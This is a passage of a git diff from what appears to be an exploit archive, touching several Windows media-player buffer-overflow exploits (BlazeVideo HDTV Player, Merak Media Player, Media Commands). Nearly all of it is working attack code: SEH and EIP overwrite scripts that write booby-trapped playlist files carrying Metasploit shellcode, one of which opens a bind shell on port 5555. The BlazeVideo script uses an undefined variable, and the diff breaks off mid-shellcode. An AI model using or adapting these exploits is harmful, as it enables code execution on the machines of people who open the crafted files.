-	"\x38\x4c\x4b\x63\x6f\x45\x70\x55\x51\x5a\x4b\x31\x59\x6c\x4b\x44"
-	"\x74\x6c\x4b\x55\x51\x4a\x4e\x76\x51\x49\x50\x6d\x49\x4c\x6c\x4e"
-	"\x64\x6f\x30\x30\x74\x43\x37\x7a\x61\x59\x5a\x36\x6d\x46\x61\x6a"
-	"\x62\x58\x6b\x7a\x54\x45\x6b\x76\x34\x47\x54\x64\x44\x53\x45\x79"
-	"\x75\x4c\x4b\x63\x6f\x51\x34\x67\x71\x4a\x4b\x50\x66\x4c\x4b\x76"
-	"\x6c\x30\x4b\x4c\x4b\x43\x6f\x67\x6c\x34\x41\x58\x6b\x6e\x6b\x75"
-	"\x4c\x6c\x4b\x37\x71\x38\x6b\x6c\x49\x63\x6c\x54\x64\x44\x44\x79"
-	"\x53\x50\x31\x69\x50\x63\x54\x4c\x4b\x63\x70\x34\x70\x4b\x35\x4f"
-	"\x30\x53\x48\x56\x6c\x6e\x6b\x71\x50\x76\x6c\x4c\x4b\x34\x30\x45"
-	"\x4c\x4c\x6d\x4e\x6b\x50\x68\x55\x58\x5a\x4b\x54\x49\x4c\x4b\x6f"
-	"\x70\x4e\x50\x55\x50\x63\x30\x75\x50\x4c\x4b\x72\x48\x55\x6c\x71"
-	"\x4f\x45\x61\x39\x66\x41\x70\x72\x76\x4f\x79\x6b\x48\x4d\x53\x4f"
-	"\x30\x73\x4b\x50\x50\x50\x68\x6a\x4f\x48\x4e\x6d\x30\x43\x50\x62"
-	"\x48\x6f\x68\x4b\x4e\x4f\x7a\x74\x4e\x46\x37\x39\x6f\x69\x77\x41"
-	"\x63\x50\x6f\x70\x6c\x75\x50\x65"
-	)
-
-payload = garbage + eip + nop + shellcode + nop
-
-try:
-	out_file = open("Groundhog_Day.plf",'w')
-	out_file.write(payload)
-	out_file.close()
-	raw_input("\n\n[*] Evil playlist successfully created.\n\nPress any key to continue...")
-except:
-	print "Oops!"
-
-# milw0rm.com [2009-02-04]
+#!/usr/bin/python
+#
+# Title: BlazeVideo HDTV Player <= 3.5 PLF Playlist File  Remote Heap Overflow Exploit
+#
+# Summary: BlazeVideo HDTV Player (BlazeDTV) is a full-featured and easy-to-use HDTV
+# Player software, combining HDTV playback, FM receiving, video record and DVD playback
+# functions. You can make advantage of PC monitor's high resolution, watch, record, playback
+# high definition HDTV program or teletext broadcast program.
+#
+# Product web page: http://www.blazevideo.com/hdtv-player/index.htm
+#
+# Tested on Microsoft Windows XP Professional SP2 (English)
+#
+# ------------------------------------windbg------------------------------------
+#
+# (620.d74): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=00000001 ebx=77f6c15c ecx=04eb0dc0 edx=00000042 esi=0266ffc0 edi=00000001
+# eip=43434343 esp=0013f288 ebp=6405247c iopl=0         nv up ei pl nz ac pe nc
+# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
+# 43434343 ??              ???
+#
+#--------------------------------------------------------------------------------
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#
+# liquidworm [t00t] gmail [w00t] com
+#
+# http://www.zeroscience.org/
+#
+# 03.01.2009
+#
+
+
+print "--------------------------------------------------------------------------"
+print " BlazeVideo HDTV Player <= 3.5 Playlist File Remote Heap Overflow Exploit\n"
+print "\t\t\tby LiquidWorm [liquidworm[t00t]gmail.com] - 2009\n"
+print "--------------------------------------------------------------------------"
+
+buffer = "\x41" * 260
+
+eip = "\xc0\x25\x49\x7e" #jmp esp  user32.dll
+
+nop = "\x90" * 15
+
+# win32_exec -  EXITFUNC=thread CMD=sol Size=328 Encoder=Alpha2 http://metasploit.com
+shellcode = (
+	"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+	"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x48\x6a\x65"
+	"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x75\x32\x41\x42\x32\x42"
+	"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x39\x79\x6b\x4c\x4a"
+	"\x48\x47\x34\x43\x30\x45\x50\x57\x70\x4c\x4b\x71\x55\x77\x4c\x4c"
+	"\x4b\x71\x6c\x37\x75\x30\x78\x75\x51\x78\x6f\x4c\x4b\x52\x6f\x32"
+	"\x38\x4c\x4b\x63\x6f\x45\x70\x55\x51\x5a\x4b\x31\x59\x6c\x4b\x44"
+	"\x74\x6c\x4b\x55\x51\x4a\x4e\x76\x51\x49\x50\x6d\x49\x4c\x6c\x4e"
+	"\x64\x6f\x30\x30\x74\x43\x37\x7a\x61\x59\x5a\x36\x6d\x46\x61\x6a"
+	"\x62\x58\x6b\x7a\x54\x45\x6b\x76\x34\x47\x54\x64\x44\x53\x45\x79"
+	"\x75\x4c\x4b\x63\x6f\x51\x34\x67\x71\x4a\x4b\x50\x66\x4c\x4b\x76"
+	"\x6c\x30\x4b\x4c\x4b\x43\x6f\x67\x6c\x34\x41\x58\x6b\x6e\x6b\x75"
+	"\x4c\x6c\x4b\x37\x71\x38\x6b\x6c\x49\x63\x6c\x54\x64\x44\x44\x79"
+	"\x53\x50\x31\x69\x50\x63\x54\x4c\x4b\x63\x70\x34\x70\x4b\x35\x4f"
+	"\x30\x53\x48\x56\x6c\x6e\x6b\x71\x50\x76\x6c\x4c\x4b\x34\x30\x45"
+	"\x4c\x4c\x6d\x4e\x6b\x50\x68\x55\x58\x5a\x4b\x54\x49\x4c\x4b\x6f"
+	"\x70\x4e\x50\x55\x50\x63\x30\x75\x50\x4c\x4b\x72\x48\x55\x6c\x71"
+	"\x4f\x45\x61\x39\x66\x41\x70\x72\x76\x4f\x79\x6b\x48\x4d\x53\x4f"
+	"\x30\x73\x4b\x50\x50\x50\x68\x6a\x4f\x48\x4e\x6d\x30\x43\x50\x62"
+	"\x48\x6f\x68\x4b\x4e\x4f\x7a\x74\x4e\x46\x37\x39\x6f\x69\x77\x41"
+	"\x63\x50\x6f\x70\x6c\x75\x50\x65"
+	)
+
+payload = garbage + eip + nop + shellcode + nop
+
+try:
+	out_file = open("Groundhog_Day.plf",'w')
+	out_file.write(payload)
+	out_file.close()
+	raw_input("\n\n[*] Evil playlist successfully created.\n\nPress any key to continue...")
+except:
+	print "Oops!"
+
+# milw0rm.com [2009-02-04]
diff --git a/platforms/windows/local/798.c b/platforms/windows/local/798.c
index 09e59eb41..623d6251a 100755
--- a/platforms/windows/local/798.c
+++ b/platforms/windows/local/798.c
@@ -66,6 +66,6 @@ int main(void)
  
 	return 0;
 }
-
-
-// milw0rm.com [2005-02-08]
+
+
+// milw0rm.com [2005-02-08]
diff --git a/platforms/windows/local/8126.py b/platforms/windows/local/8126.py
index 0fb634d9e..9ba8cde96 100755
--- a/platforms/windows/local/8126.py
+++ b/platforms/windows/local/8126.py
@@ -1,55 +1,55 @@
-#exploit.py
-#
-# Merak Media Player 3.2 Buffer Overflow Exploit(SEH)
-# By:Encrypt3d.M!nd
-#    m1nd3d.wordpress.com
-#
-# Orginal Advisory:
-# http://www.milw0rm.com/exploits/7857
-######################################################
-# Nothing Intersting in this exploit,too easy
-# just improving my SEH exploitation Skills :p
-#
-
-ns = "\xEB\x06\x90\x90"
-
-sh = "\x35\x2F\xD1\x72" # msacm32.drv ..windows xp sp2
-
-chars = "A" * 74
-
-nops = "\x90" * 20
-
-
-# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum
-http://metasploit.com
-
-shellcode = (
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
-"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x33\x4b\x48\x4e\x37"
-"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x48"
-"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x38"
-"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48"
-"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x54"
-"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x38"
-"\x41\x50\x4b\x4e\x49\x58\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x43"
-"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37"
-"\x4e\x50\x4b\x38\x42\x54\x4e\x30\x4b\x38\x42\x37\x4e\x51\x4d\x4a"
-"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x58\x42\x4b"
-"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
-"\x48\x4f\x42\x56\x48\x45\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
-"\x42\x35\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x35\x4a\x46\x4a\x39"
-"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
-"\x4e\x46\x43\x56\x50\x42\x45\x36\x4a\x37\x45\x36\x42\x30\x5a")
-
-
-file=open('geek.m3u','w')
-file.write(chars+ns+sh+nops+shellcode)
-file.close()
-
-# milw0rm.com [2009-03-02]
+#exploit.py
+#
+# Merak Media Player 3.2 Buffer Overflow Exploit(SEH)
+# By:Encrypt3d.M!nd
+#    m1nd3d.wordpress.com
+#
+# Orginal Advisory:
+# http://www.milw0rm.com/exploits/7857
+######################################################
+# Nothing Intersting in this exploit,too easy
+# just improving my SEH exploitation Skills :p
+#
+
+ns = "\xEB\x06\x90\x90"
+
+sh = "\x35\x2F\xD1\x72" # msacm32.drv ..windows xp sp2
+
+chars = "A" * 74
+
+nops = "\x90" * 20
+
+
+# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum
+http://metasploit.com
+
+shellcode = (
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
+"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x33\x4b\x48\x4e\x37"
+"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x48"
+"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x38"
+"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48"
+"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x54"
+"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x38"
+"\x41\x50\x4b\x4e\x49\x58\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x43"
+"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37"
+"\x4e\x50\x4b\x38\x42\x54\x4e\x30\x4b\x38\x42\x37\x4e\x51\x4d\x4a"
+"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x58\x42\x4b"
+"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
+"\x48\x4f\x42\x56\x48\x45\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
+"\x42\x35\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x35\x4a\x46\x4a\x39"
+"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
+"\x4e\x46\x43\x56\x50\x42\x45\x36\x4a\x37\x45\x36\x42\x30\x5a")
+
+
+file=open('geek.m3u','w')
+file.write(chars+ns+sh+nops+shellcode)
+file.close()
+
+# milw0rm.com [2009-03-02]
diff --git a/platforms/windows/local/8137.py b/platforms/windows/local/8137.py
index a98e78933..7aea96e9a 100755
--- a/platforms/windows/local/8137.py
+++ b/platforms/windows/local/8137.py
@@ -1,58 +1,58 @@
-#usage: exploit.py
-print "**************************************************************************"
-print " Media Commands (m3u File) local Seh Overwrite Exploit\n"
-print " Founder: Hakxer"
-print " Exploited: His0k4"
-print " Tested on: Windows XP Pro SP2 Fr\n"
-print " Greetings to:"
-print " All friends & muslims HaCkers(dz)\n"
-print "**************************************************************************"
-         	
-
-			
-			
-buff = "\x41" * 4103
-
-next_seh = "\xEB\x06\x90\x90" 
-
-seh = "\x35\x2F\xC6\x72" #pop pop ret msacm32.drv
-
-nop = "\x90" * 19
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-shellcode = (
-	"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-	"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-	"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-	"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-	"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
-	"\x42\x50\x42\x50\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
-	"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x58"
-	"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58"
-	"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
-	"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
-	"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
-	"\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
-	"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
-	"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x33"
-	"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x37"
-	"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
-	"\x4b\x38\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
-	"\x42\x30\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x33\x4f\x35\x41\x43"
-	"\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
-	"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x55\x4a\x36\x4a\x49"
-	"\x50\x4f\x4c\x58\x50\x30\x47\x55\x4f\x4f\x47\x4e\x50\x36\x4f\x46"
-	"\x46\x47\x45\x56\x42\x57\x41\x56\x46\x56\x42\x30\x5a"
-    )
-
-exploit = buff + next_seh + seh + nop + shellcode
-
-try:
-    out_file = open("exploit.m3u",'w')
-    out_file.write(exploit)
-    out_file.close()
-    print "Exploit File Created!"
-except:
-    print "Error"
-
-# milw0rm.com [2009-03-02]
+#usage: exploit.py
+print "**************************************************************************"
+print " Media Commands (m3u File) local Seh Overwrite Exploit\n"
+print " Founder: Hakxer"
+print " Exploited: His0k4"
+print " Tested on: Windows XP Pro SP2 Fr\n"
+print " Greetings to:"
+print " All friends & muslims HaCkers(dz)\n"
+print "**************************************************************************"
+         	
+
+			
+			
+buff = "\x41" * 4103
+
+next_seh = "\xEB\x06\x90\x90" 
+
+seh = "\x35\x2F\xC6\x72" #pop pop ret msacm32.drv
+
+nop = "\x90" * 19
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+shellcode = (
+	"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+	"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+	"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+	"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+	"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
+	"\x42\x50\x42\x50\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47"
+	"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x58"
+	"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58"
+	"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
+	"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
+	"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
+	"\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
+	"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
+	"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x33"
+	"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x37"
+	"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
+	"\x4b\x38\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
+	"\x42\x30\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x33\x4f\x35\x41\x43"
+	"\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
+	"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x55\x4a\x36\x4a\x49"
+	"\x50\x4f\x4c\x58\x50\x30\x47\x55\x4f\x4f\x47\x4e\x50\x36\x4f\x46"
+	"\x46\x47\x45\x56\x42\x57\x41\x56\x46\x56\x42\x30\x5a"
+    )
+
+exploit = buff + next_seh + seh + nop + shellcode
+
+try:
+    out_file = open("exploit.m3u",'w')
+    out_file.write(exploit)
+    out_file.close()
+    print "Exploit File Created!"
+except:
+    print "Error"
+
+# milw0rm.com [2009-03-02]
diff --git a/platforms/windows/local/8159.rb b/platforms/windows/local/8159.rb
index da3b7dc44..26daf174c 100755
--- a/platforms/windows/local/8159.rb
+++ b/platforms/windows/local/8159.rb
@@ -1,82 +1,82 @@
-#!/usr/bin/env ruby
-# Media Commands .m3l Local Buffer Overflow Exploit
-# By Mountassif Moad
-# Down : http://www.mediacommands.com/download/&product=MCV100A.exe
-# C:\nc>nc -v 127.0.0.1 5555
-# DNS fwd/rev mismatch: localhost != stack-f286641
-# localhost [127.0.0.1] 5555 (?) open
-# Microsoft Windows XP [version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-# C:\Program Files\Media Commands\Animation>
-# exit Booooooooooom
-time3 = Time.new
-puts "Exploit Started in Current Time :" + time3.inspect
-puts "Enter Name For your File Like : Stack"
-moad = gets.chomp.capitalize
-puts "Name Of File : " + moad +'.m3l'
-time1 = Time.new
-$VERBOSE=nil
-Header =  
-"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74"+
-"\x5D\x0D\x4E\x75\x6D\x62\x65\x72"+
-"\x4F\x66\x45\x6E\x74\x72\x69\x65"+
-"\x73\x3D\x31\x0D\x46\x69\x6C\x65\x31\x3D"
-# win32_bind -  EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com
-Shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"+
-"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"+
-"\x4e\x46\x46\x42\x46\x52\x4b\x58\x45\x44\x4e\x53\x4b\x48\x4e\x47"+
-"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x48"+
-"\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x33\x4b\x48"+
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"+
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"+
-"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48"+
-"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"+
-"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x32\x4b\x58"+
-"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x56\x43\x4c\x41\x43\x4b\x4d"+
-"\x46\x46\x4b\x58\x43\x34\x42\x43\x4b\x48\x42\x34\x4e\x50\x4b\x58"+
-"\x42\x37\x4e\x41\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x35\x4a\x36"+
-"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46"+
-"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x37"+
-"\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"+
-"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"+
-"\x48\x36\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x30"+
-"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45"+
-"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x35\x43\x45\x43\x55\x43\x34"+
-"\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x45\x41"+
-"\x43\x4b\x48\x36\x43\x45\x49\x48\x41\x4e\x45\x39\x4a\x56\x46\x4a"+
-"\x4c\x31\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41"+
-"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"+
-"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"+
-"\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"+
-"\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56"+
-"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x35"+
-"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x46"+
-"\x4d\x46\x49\x48\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c"+
-"\x49\x48\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c"+
-"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x32"+
-"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"+
-"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f"+
-"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x45\x41\x45\x41\x45\x4c\x56"+
-"\x41\x30\x41\x45\x41\x55\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x56"+
-"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"+
-"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f"+
-"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"+
-"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x55\x43\x55\x4f\x4f\x48\x4d"+
-"\x4f\x4f\x42\x4d\x5a"
-Bof    =  "\x41" * 4097
-Nseh = "\xEB\x06\x90\x90"
-seh  = "\x35\x2F\xC6\x72"
-Nop  = "\x90" * 15
-crash =  Header + Bof + Nseh + seh + Nop + Shellcode
-File.open( moad+".m3l", "w" ) do |the_file|
-the_file.puts(crash)
-puts "Exploit finished in Current Time :" + time1.inspect
-puts "Now Open " + moad +".m3l :d"
-end
-
-# milw0rm.com [2009-03-05]
+#!/usr/bin/env ruby
+# Media Commands .m3l Local Buffer Overflow Exploit
+# By Mountassif Moad
+# Down : http://www.mediacommands.com/download/&product=MCV100A.exe
+# C:\nc>nc -v 127.0.0.1 5555
+# DNS fwd/rev mismatch: localhost != stack-f286641
+# localhost [127.0.0.1] 5555 (?) open
+# Microsoft Windows XP [version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+# C:\Program Files\Media Commands\Animation>
+# exit Booooooooooom
+time3 = Time.new
+puts "Exploit Started in Current Time :" + time3.inspect
+puts "Enter Name For your File Like : Stack"
+moad = gets.chomp.capitalize
+puts "Name Of File : " + moad +'.m3l'
+time1 = Time.new
+$VERBOSE=nil
+Header =  
+"\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74"+
+"\x5D\x0D\x4E\x75\x6D\x62\x65\x72"+
+"\x4F\x66\x45\x6E\x74\x72\x69\x65"+
+"\x73\x3D\x31\x0D\x46\x69\x6C\x65\x31\x3D"
+# win32_bind -  EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com
+Shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"+
+"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"+
+"\x4e\x46\x46\x42\x46\x52\x4b\x58\x45\x44\x4e\x53\x4b\x48\x4e\x47"+
+"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x48"+
+"\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x33\x4b\x48"+
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"+
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"+
